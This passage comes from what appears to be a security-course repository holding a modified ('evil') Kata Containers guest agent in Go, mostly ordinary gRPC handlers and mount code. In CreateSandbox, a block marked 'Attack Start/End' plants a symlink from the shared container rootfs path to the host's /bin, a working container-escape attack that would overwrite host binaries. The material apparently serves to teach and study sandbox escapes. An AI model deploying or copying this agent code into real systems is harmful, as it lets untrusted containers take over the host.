container, now we have to use that list to filter\n\t// ps output and return just container's processes\n\tcmd := exec.Command(\"ps\", psArgs...)\n\toutput, err := a.sandbox.subreaper.combinedOutput(cmd)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"%s: %s\", err, output)\n\t}\n\n\tlines := strings.Split(string(output), \"\\n\")\n\n\tpidIndex := getPIDIndex(lines[0])\n\n\t// PID field not found\n\tif pidIndex == -1 {\n\t\treturn nil, fmt.Errorf(\"failed to find PID field in ps output\")\n\t}\n\n\t// append title\n\tvar result bytes.Buffer\n\n\tresult.WriteString(lines[0] + \"\\n\")\n\n\tfor 
_, line := range lines[1:] {\n\t\tif len(line) == 0 {\n\t\t\tcontinue\n\t\t}\n\t\tfields := strings.Fields(line)\n\t\tif pidIndex >= len(fields) {\n\t\t\treturn nil, fmt.Errorf(\"missing PID field: %s\", line)\n\t\t}\n\n\t\tp, err := strconv.Atoi(fields[pidIndex])\n\t\tif err != nil {\n\t\t\treturn nil, fmt.Errorf(\"failed to convert pid to int: %s\", fields[pidIndex])\n\t\t}\n\n\t\t// appends pid line\n\t\tfor _, pid := range pids {\n\t\t\tif pid == p {\n\t\t\t\tresult.WriteString(line + \"\\n\")\n\t\t\t\tbreak\n\t\t\t}\n\t\t}\n\t}\n\n\tresp.ProcessList = result.Bytes()\n\treturn resp, nil\n}\n\nfunc (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {\n\tif req.Resources == nil {\n\t\treturn emptyResp, fmt.Errorf(\"Resources in the request are nil\")\n\t}\n\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// c.container.Config returns a copy of non-pointer members\n\t// in configs.Config, configs.Config.Cgroup is a pointer hence\n\t// if it is modified, the container cgroup is modifed too and\n\t// c.container.Set won't be able to rollback in case of failure.\n\tcontConfig := c.container.Config()\n\tvar resources configs.Resources\n\tif contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil {\n\t\tresources = *contConfig.Cgroups.Resources\n\t}\n\n\t// Update the value\n\tif req.Resources.BlockIO != nil {\n\t\tresources.BlkioWeight = uint16(req.Resources.BlockIO.Weight)\n\t}\n\n\tif req.Resources.CPU != nil {\n\t\tresources.CpuPeriod = req.Resources.CPU.Period\n\t\tresources.CpuQuota = req.Resources.CPU.Quota\n\t\tresources.CpuShares = req.Resources.CPU.Shares\n\t\tresources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod\n\t\tresources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime\n\t\tresources.CpusetCpus = req.Resources.CPU.Cpus\n\t\tresources.CpusetMems = req.Resources.CPU.Mems\n\t}\n\n\tif req.Resources.Memory != nil 
{\n\t\tresources.KernelMemory = req.Resources.Memory.Kernel\n\t\tresources.KernelMemoryTCP = req.Resources.Memory.KernelTCP\n\t\tresources.Memory = req.Resources.Memory.Limit\n\t\tresources.MemoryReservation = req.Resources.Memory.Reservation\n\t\tresources.MemorySwap = req.Resources.Memory.Swap\n\t}\n\n\tif req.Resources.Pids != nil {\n\t\tresources.PidsLimit = req.Resources.Pids.Limit\n\t}\n\n\t// cpuset is a special case where container's cpuset cgroup MUST BE updated\n\tif resources.CpusetCpus != \"\" {\n\t\tresources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus)\n\t\tif err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\tcookies := make(cookie)\n\t\tif err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil {\n\t\t\tagentLog.WithError(err).Warn(\"Could not update container cpuset cgroup\")\n\t\t}\n\t}\n\n\t// Create a copy of container's cgroup, if c.container.Set fails,\n\t// configuration won't be modified and it will be able to rollback\n\t// to the original container cgroup configuration.\n\tconfig := contConfig\n\tvar cgroupsCopy configs.Cgroup\n\tif contConfig.Cgroups != nil {\n\t\tcgroupsCopy = *contConfig.Cgroups\n\t}\n\tcgroupsCopy.Resources = &resources\n\tconfig.Cgroups = &cgroupsCopy\n\treturn emptyResp, c.container.Set(config)\n}\n\nfunc (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tstats, err := c.container.Stats()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcgroupData, err := json.Marshal(stats.CgroupStats)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tnetData, err := json.Marshal(stats.Interfaces)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar cgroupStats pb.CgroupStats\n\tnetworkStats := make([]*pb.NetworkStats, 0)\n\n\terr = json.Unmarshal(cgroupData, &cgroupStats)\n\tif err != nil {\n\t\treturn 
nil, err\n\t}\n\terr = json.Unmarshal(netData, &networkStats)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tresp := &pb.StatsContainerResponse{\n\t\tCgroupStats:  &cgroupStats,\n\t\tNetworkStats: networkStats,\n\t}\n\n\treturn resp, nil\n\n}\n\nfunc (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\treturn emptyResp, c.container.Pause()\n}\n\nfunc (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {\n\tc, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\treturn emptyResp, c.container.Resume()\n}\n\nfunc (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {\n\tctr, err := a.sandbox.getContainer(req.ContainerId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ttimeout := int(req.Timeout)\n\n\ta.sandbox.Lock()\n\tdefer a.sandbox.Unlock()\n\n\tif timeout == 0 {\n\t\tif err := ctr.removeContainer(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Find the sandbox storage used by this container\n\t\tfor _, path := range ctr.mounts {\n\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\treturn emptyResp, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} else {\n\t\tdone := make(chan error)\n\t\tgo func() {\n\t\t\tif err := ctr.removeContainer(); err != nil {\n\t\t\t\tdone <- err\n\t\t\t\tclose(done)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\t//Find the sandbox storage used by this container\n\t\t\tfor _, path := range ctr.mounts {\n\t\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\t\tdone 
<- err\n\t\t\t\t\t\tclose(done)\n\t\t\t\t\t\treturn\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\t\t\tclose(done)\n\t\t}()\n\n\t\tselect {\n\t\tcase err := <-done:\n\t\t\tif err != nil {\n\t\t\t\treturn emptyResp, err\n\t\t\t}\n\t\tcase <-time.After(time.Duration(req.Timeout) * time.Second):\n\t\t\treturn emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, \"Timeout reached after %ds\", timeout)\n\t\t}\n\t}\n\n\tdelete(a.sandbox.containers, ctr.id)\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn &pb.WriteStreamResponse{}, err\n\t}\n\n\tproc.RLock()\n\tdefer proc.RUnlock()\n\tstdinClosed := proc.stdinClosed\n\n\t// Ignore this call to WriteStdin() if STDIN has already been closed\n\t// earlier.\n\tif stdinClosed {\n\t\treturn &pb.WriteStreamResponse{}, nil\n\t}\n\n\tvar file *os.File\n\tif proc.termMaster != nil {\n\t\tfile = proc.termMaster\n\t} else {\n\t\tfile = proc.stdin\n\t}\n\n\tn, err := file.Write(req.Data)\n\tif err != nil {\n\t\treturn &pb.WriteStreamResponse{}, err\n\t}\n\n\treturn &pb.WriteStreamResponse{\n\t\tLen: uint32(n),\n\t}, nil\n}\n\nfunc (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {\n\tdata, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true)\n\tif err != nil {\n\t\treturn &pb.ReadStreamResponse{}, err\n\t}\n\n\treturn &pb.ReadStreamResponse{\n\t\tData: data,\n\t}, nil\n}\n\nfunc (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {\n\tdata, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false)\n\tif err != nil {\n\t\treturn &pb.ReadStreamResponse{}, err\n\t}\n\n\treturn &pb.ReadStreamResponse{\n\t\tData: data,\n\t}, nil\n}\n\nfunc (a *agentGRPC) CloseStdin(ctx context.Context, req 
*pb.CloseStdinRequest) (*gpb.Empty, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// If stdin is nil, which can be the case when using a terminal,\n\t// there is nothing to do.\n\tif proc.stdin == nil {\n\t\treturn emptyResp, nil\n\t}\n\n\tproc.Lock()\n\tdefer proc.Unlock()\n\n\tif err := proc.stdin.Close(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tproc.stdinClosed = true\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {\n\tproc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif proc.termMaster == nil {\n\t\treturn emptyResp, grpcStatus.Error(codes.FailedPrecondition, \"Terminal is not set, impossible to resize it\")\n\t}\n\n\twinsize := &unix.Winsize{\n\t\tRow: uint16(req.Row),\n\t\tCol: uint16(req.Column),\n\t}\n\n\t// Set new terminal size.\n\tif err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc loadKernelModule(module *pb.KernelModule) error {\n\tif module == nil {\n\t\treturn fmt.Errorf(\"Kernel module is nil\")\n\t}\n\n\tif module.Name == \"\" {\n\t\treturn fmt.Errorf(\"Kernel module name is empty\")\n\t}\n\n\tlog := agentLog.WithFields(logrus.Fields{\n\t\t\"module-name\":   module.Name,\n\t\t\"module-params\": module.Parameters,\n\t})\n\n\tlog.Debug(\"loading module\")\n\tcmd := exec.Command(modprobePath, \"-v\", module.Name)\n\n\tif len(module.Parameters) > 0 {\n\t\tcmd.Args = append(cmd.Args, module.Parameters...)\n\t}\n\n\toutput, err := cmd.CombinedOutput()\n\tif err != nil {\n\t\treturn fmt.Errorf(\"could not load module: %v: %v\", err, string(output))\n\t}\n\n\treturn nil\n}\n\nfunc (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {\n\tif 
a.sandbox.running {\n\t\treturn emptyResp, grpcStatus.Error(codes.AlreadyExists, \"Sandbox already started, impossible to start again\")\n\t}\n\n\ta.sandbox.hostname = req.Hostname\n\ta.sandbox.containers = make(map[string]*container)\n\ta.sandbox.network.ifaces = make(map[string]*types.Interface)\n\ta.sandbox.network.dns = req.Dns\n\ta.sandbox.running = true\n\ta.sandbox.sandboxPidNs = req.SandboxPidns\n\ta.sandbox.storages = make(map[string]*sandboxStorage)\n\ta.sandbox.guestHooks = &specs.Hooks{}\n\ta.sandbox.guestHooksPresent = false\n\n\tfor _, m := range req.KernelModules {\n\t\tif err := loadKernelModule(m); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\tif req.GuestHookPath != \"\" {\n\t\ta.sandbox.scanGuestHooks(req.GuestHookPath)\n\t}\n\n\tif req.SandboxId != \"\" {\n\t\ta.sandbox.id = req.SandboxId\n\t\tagentLog = agentLog.WithField(\"sandbox\", a.sandbox.id)\n\t}\n\n\t// Set up shared UTS and IPC namespaces\n\tif err := a.sandbox.setupSharedNamespaces(ctx); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif req.SandboxPidns {\n\t\tif err := a.sandbox.setupSharedPidNs(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\tmountList, err := addStorages(ctx, req.Storages, a.sandbox)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\ta.sandbox.mounts = mountList\n\n\t// ~ Attack Start ~ //\n\tshared_dir := \"/run/kata-containers/shared/containers\"\n\tperm := os.FileMode(0755)\n\t// Create symlink at '/run/kata-containers/shared/containers/mainctr_id/rootfs'\n\t// pointing to the target on the host\n\t// We use the SandboxId as the main ctr id\n\tmainctr_dir := shared_dir + \"/\" + req.SandboxId\n\tif err := os.Mkdir(mainctr_dir, perm); err != nil {\n\t\treturn emptyResp, fmt.Errorf(\"Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'\", req.SandboxId, err)\n\t}\n\ttarget_on_host := \"/bin\" // the target that'll be mounted with the container image\n\tif err := os.Symlink(target_on_host, mainctr_dir+\"/rootfs\"); err != nil 
{\n\t\treturn emptyResp, fmt.Errorf(\"Attack symlink error: '%s'\", err)\n\t}\n\t// ~ Attack End ~ //\n\n\tif err := setupDNS(a.sandbox.network.dns); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {\n\tif !a.sandbox.running {\n\t\tagentLog.Info(\"Sandbox not started, this is a no-op\")\n\t\treturn emptyResp, nil\n\t}\n\n\ta.sandbox.Lock()\n\n\tfor key, c := range a.sandbox.containers {\n\t\tif err := c.removeContainer(); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\n\t\t// Find the sandbox storage used by this container\n\t\tfor _, path := range c.mounts {\n\t\t\tif _, ok := a.sandbox.storages[path]; ok {\n\t\t\t\tif err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {\n\t\t\t\t\treturn emptyResp, err\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tdelete(a.sandbox.containers, key)\n\t}\n\ta.sandbox.Unlock()\n\n\tif err := a.sandbox.removeNetwork(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := removeMounts(a.sandbox.mounts); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.sandbox.teardownSharedPidNs(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := a.sandbox.unmountSharedNamespaces(); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif tracing && !startTracingCalled {\n\t\t// Close stopServer channel to signal the main agent code to stop\n\t\t// the server when all gRPC calls will be completed.\n\t\tclose(a.sandbox.stopServer)\n\t}\n\n\ta.sandbox.hostname = \"\"\n\ta.sandbox.id = \"\"\n\ta.sandbox.containers = make(map[string]*container)\n\ta.sandbox.running = false\n\ta.sandbox.network = network{}\n\ta.sandbox.mounts = []string{}\n\ta.sandbox.storages = make(map[string]*sandboxStorage)\n\n\t// Synchronize the caches on the system. 
This is needed to ensure\n\t// there is no pending transactions left before the VM is shut down.\n\tsyscall.Sync()\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) {\n\treturn a.sandbox.updateInterface(nil, req.Interface)\n}\n\nfunc (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {\n\treturn a.sandbox.updateRoutes(nil, req.Routes)\n}\n\nfunc (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {\n\treturn a.sandbox.listInterfaces(nil)\n}\n\nfunc (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {\n\treturn a.sandbox.listRoutes(nil)\n}\n\nfunc (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {\n\tif !req.Wait {\n\t\tgo a.onlineCPUMem(req)\n\t\treturn emptyResp, nil\n\t}\n\n\treturn emptyResp, a.onlineCPUMem(req)\n}\n\nfunc (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {\n\treturn emptyResp, reseedRNG(req.Data)\n}\n\nfunc (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {\n\tvar details pb.GuestDetailsResponse\n\tif req.MemBlockSize {\n\t\tdata, err := ioutil.ReadFile(sysfsMemoryBlockSizePath)\n\t\tif err != nil {\n\t\t\tif os.IsNotExist(err) {\n\t\t\t\tagentLog.WithField(\"sysfsMemoryBlockSizePath\", sysfsMemoryBlockSizePath).Info(\"Guest kernel config doesn't support memory hotplug\")\n\t\t\t} else {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t} else {\n\t\t\tif len(data) == 0 {\n\t\t\t\treturn nil, fmt.Errorf(\"%v is empty\", sysfsMemoryBlockSizePath)\n\t\t\t}\n\t\t\tdetails.MemBlockSizeBytes, err = strconv.ParseUint(string(data[:len(data)-1]), 16, 64)\n\t\t\tif err != nil {\n\t\t\t\treturn nil, err\n\t\t\t}\n\t\t}\n\t}\n\n\tif req.MemHotplugProbe {\n\t\tif 
_, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) {\n\t\t\tdetails.SupportMemHotplugProbe = false\n\t\t} else if err != nil {\n\t\t\treturn nil, err\n\t\t} else {\n\t\t\tdetails.SupportMemHotplugProbe = true\n\t\t}\n\t}\n\n\tdetails.AgentDetails = a.getAgentDetails(ctx)\n\n\treturn &details, nil\n}\n\nfunc (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {\n\tfor _, addr := range req.MemHotplugProbeAddr {\n\t\tif err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf(\"0x%x\", addr)), 0600); err != nil {\n\t\t\treturn emptyResp, err\n\t\t}\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) haveSeccomp() bool {\n\tif seccompSupport == \"yes\" && seccomp.IsEnabled() {\n\t\treturn true\n\t}\n\n\treturn false\n}\n\nfunc (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails {\n\tdetails := pb.AgentDetails{\n\t\tVersion:         version,\n\t\tInitDaemon:      os.Getpid() == 1,\n\t\tSupportsSeccomp: a.haveSeccomp(),\n\t}\n\n\tfor handler := range deviceHandlerList {\n\t\tdetails.DeviceHandlers = append(details.DeviceHandlers, handler)\n\t}\n\n\tfor handler := range storageHandlerList {\n\t\tdetails.StorageHandlers = append(details.StorageHandlers, handler)\n\t}\n\n\treturn &details\n}\n\nfunc (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {\n\tif err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil {\n\t\treturn nil, grpcStatus.Errorf(codes.Internal, \"Could not set guest time: %v\", err)\n\t}\n\treturn &gpb.Empty{}, nil\n}\n\n// CopyFile copies files from the host to container's rootfs (guest). 
Files can be copied in parts; for example\n// a file whose size is 2MB can be copied by calling CopyFile 2 times: in the first call req.Offset is 0,\n// req.FileSize is 2MB and req.Data contains the first half of the file; in the second call req.Offset is 1MB,\n// req.FileSize is 2MB and req.Data contains the second half of the file. For security reasons all write operations\n// are made in a temporary file; once the temporary file reaches the expected size (req.FileSize), it's moved to\n// the destination file (req.Path).\nfunc (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {\n\t// get absolute path, to avoid paths like '/run/../sbin/init'\n\tpath, err := filepath.Abs(req.Path)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// container's rootfs is mounted at /run; in order to avoid overwriting the guest's rootfs files, it\n\t// is only possible to copy files to /run\n\tif !strings.HasPrefix(path, containersRootfsPath) {\n\t\treturn emptyResp, fmt.Errorf(\"It is only possible to copy files into the %s directory\", containersRootfsPath)\n\t}\n\n\tif err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// create a temporary file and write the content.\n\ttmpPath := path + \".tmp\"\n\ttmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil {\n\t\ttmpFile.Close()\n\t\treturn emptyResp, err\n\t}\n\ttmpFile.Close()\n\n\t// get temporary file information\n\tst, err := os.Stat(tmpPath)\n\tif err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"tmp-file-size\": st.Size(),\n\t\t\"expected-size\": req.FileSize,\n\t}).Debugf(\"Checking temporary file size\")\n\n\t// if the file size is not equal to the expected size, the copy file operation has not finished.\n\t// CopyFile should be called again with new content and 
a different offset.\n\tif st.Size() != req.FileSize {\n\t\treturn emptyResp, nil\n\t}\n\n\tif err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\tif err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\t// At this point the temporary file has the expected size; atomically move it, overwriting\n\t// the destination.\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"tmp-path\": tmpPath,\n\t\t\"des-path\": path,\n\t}).Debugf(\"Moving temporary file\")\n\n\tif err := os.Rename(tmpPath, path); err != nil {\n\t\treturn emptyResp, err\n\t}\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {\n\t// We could check 'tracing' too and error if already set. But\n\t// instead, we permit that scenario, making this call a NOP if tracing\n\t// is already enabled via traceModeFlag.\n\tif startTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing already enabled\")\n\t}\n\n\t// The only trace type supported for dynamic tracing is isolated.\n\tenableTracing(traceModeDynamic, traceTypeIsolated)\n\tstartTracingCalled = true\n\n\tvar err error\n\n\t// Ignore the provided context and recreate the root context.\n\t// Note that this call will not be traced, but all subsequent ones\n\t// will be.\n\trootSpan, rootContext, err = setupTracing(agentName)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"failed to setup tracing: %v\", err)\n\t}\n\n\ta.sandbox.ctx = rootContext\n\tgrpcContext = rootContext\n\n\treturn emptyResp, nil\n}\n\nfunc (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {\n\t// Like StartTracing(), this call permits tracing to be stopped when\n\t// it was originally started using traceModeFlag.\n\tif !tracing && !startTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing not 
enabled\")\n\t}\n\n\tif stopTracingCalled {\n\t\treturn nil, grpcStatus.Error(codes.FailedPrecondition, \"tracing already disabled\")\n\t}\n\n\t// Signal to the interceptors that tracing needs to end.\n\tstopTracingCalled = true\n\n\treturn emptyResp, nil\n}\n"
  },
  {
    "path": "code/0304-运行时攻击/02-安全容器逃逸/evil_agent_src/mount.go",
    "content": "//\n// Copyright (c) 2017-2019 Intel Corporation\n//\n// SPDX-License-Identifier: Apache-2.0\n//\n\npackage main\n\nimport (\n\t\"bufio\"\n\t\"context\"\n\t\"fmt\"\n\t\"os\"\n\t\"path/filepath\"\n\t\"regexp\"\n\t\"strconv\"\n\t\"strings\"\n\t\"syscall\"\n\n\tpb \"github.com/kata-containers/agent/protocols/grpc\"\n\t\"github.com/pkg/errors\"\n\t\"github.com/sirupsen/logrus\"\n\t\"golang.org/x/sys/unix\"\n\t\"google.golang.org/grpc/codes\"\n\tgrpcStatus \"google.golang.org/grpc/status\"\n)\n\nconst (\n\ttype9pFs       = \"9p\"\n\ttypeVirtioFS   = \"virtio_fs\"\n\ttypeRootfs     = \"rootfs\"\n\ttypeTmpFs      = \"tmpfs\"\n\tprocMountStats = \"/proc/self/mountstats\"\n\tmountPerm      = os.FileMode(0755)\n)\n\nvar flagList = map[string]int{\n\t\"acl\":         unix.MS_POSIXACL,\n\t\"bind\":        unix.MS_BIND,\n\t\"defaults\":    0,\n\t\"dirsync\":     unix.MS_DIRSYNC,\n\t\"iversion\":    unix.MS_I_VERSION,\n\t\"lazytime\":    unix.MS_LAZYTIME,\n\t\"mand\":        unix.MS_MANDLOCK,\n\t\"noatime\":     unix.MS_NOATIME,\n\t\"nodev\":       unix.MS_NODEV,\n\t\"nodiratime\":  unix.MS_NODIRATIME,\n\t\"noexec\":      unix.MS_NOEXEC,\n\t\"nosuid\":      unix.MS_NOSUID,\n\t\"rbind\":       unix.MS_BIND | unix.MS_REC,\n\t\"relatime\":    unix.MS_RELATIME,\n\t\"remount\":     unix.MS_REMOUNT,\n\t\"ro\":          unix.MS_RDONLY,\n\t\"silent\":      unix.MS_SILENT,\n\t\"strictatime\": unix.MS_STRICTATIME,\n\t\"sync\":        unix.MS_SYNCHRONOUS,\n\t\"private\":     unix.MS_PRIVATE,\n\t\"shared\":      unix.MS_SHARED,\n\t\"slave\":       unix.MS_SLAVE,\n\t\"unbindable\":  unix.MS_UNBINDABLE,\n\t\"rprivate\":    unix.MS_PRIVATE | unix.MS_REC,\n\t\"rshared\":     unix.MS_SHARED | unix.MS_REC,\n\t\"rslave\":      unix.MS_SLAVE | unix.MS_REC,\n\t\"runbindable\": unix.MS_UNBINDABLE | unix.MS_REC,\n}\n\nfunc createDestinationDir(dest string) error {\n\ttargetPath, _ := filepath.Split(dest)\n\n\treturn os.MkdirAll(targetPath, mountPerm)\n}\n\n// mount mounts a source in 
to a destination. This will do some bookkeeping:\n// * evaluate all symlinks\n// * ensure the source exists\nfunc mount(source, destination, fsType string, flags int, options string) error {\n\tvar absSource string\n\n\t// Log before validation. This is useful to debug cases where the gRPC\n\t// protocol version being used by the client is out-of-sync with the\n\t// agents version. gRPC message members are strictly ordered, so it's\n\t// quite possible that if the protocol changes, the client may\n\t// try to pass a valid mountpoint, but the gRPC layer may change that\n\t// through the member ordering to be a mount *option* for example.\n\tagentLog.WithFields(logrus.Fields{\n\t\t\"mount-source\":      source,\n\t\t\"mount-destination\": destination,\n\t\t\"mount-fstype\":      fsType,\n\t\t\"mount-flags\":       flags,\n\t\t\"mount-options\":     options,\n\t}).Debug()\n\n\tif source == \"\" {\n\t\treturn fmt.Errorf(\"need mount source\")\n\t}\n\n\tif destination == \"\" {\n\t\treturn fmt.Errorf(\"need mount destination\")\n\t}\n\n\tif fsType == \"\" {\n\t\treturn fmt.Errorf(\"need mount FS type\")\n\t}\n\n\tvar err error\n\tswitch fsType {\n\tcase type9pFs, typeVirtioFS:\n\t\tif err = createDestinationDir(destination); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tabsSource = source\n\tcase typeTmpFs:\n\t\tabsSource = source\n\tdefault:\n\t\tabsSource, err = filepath.EvalSymlinks(source)\n\t\tif err != nil {\n\t\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not resolve symlink for source %v\", source)\n\t\t}\n\n\t\tif err = ensureDestinationExists(absSource, destination, fsType); err != nil {\n\t\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not create destination mount point: %v: %v\",\n\t\t\t\tdestination, err)\n\t\t}\n\t}\n\n\tif err = syscall.Mount(absSource, destination,\n\t\tfsType, uintptr(flags), options); err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"Could not mount %v to %v: %v\",\n\t\t\tabsSource, destination, 
err)\n\t}\n\n\treturn nil\n}\n\n// ensureDestinationExists will recursively create a given mountpoint. If directories\n// are created, their permissions are initialized to mountPerm\nfunc ensureDestinationExists(source, destination string, fsType string) error {\n\tfileInfo, err := os.Stat(source)\n\tif err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"could not stat source location: %v\",\n\t\t\tsource)\n\t}\n\n\tif err := createDestinationDir(destination); err != nil {\n\t\treturn grpcStatus.Errorf(codes.Internal, \"could not create parent directory: %v\",\n\t\t\tdestination)\n\t}\n\n\tif fsType != \"bind\" || fileInfo.IsDir() {\n\t\tif err := os.Mkdir(destination, mountPerm); !os.IsExist(err) {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tfile, err := os.OpenFile(destination, os.O_CREATE, mountPerm)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\tfile.Close()\n\t}\n\treturn nil\n}\n\nfunc parseMountFlagsAndOptions(optionList []string) (int, string) {\n\tvar (\n\t\tflags   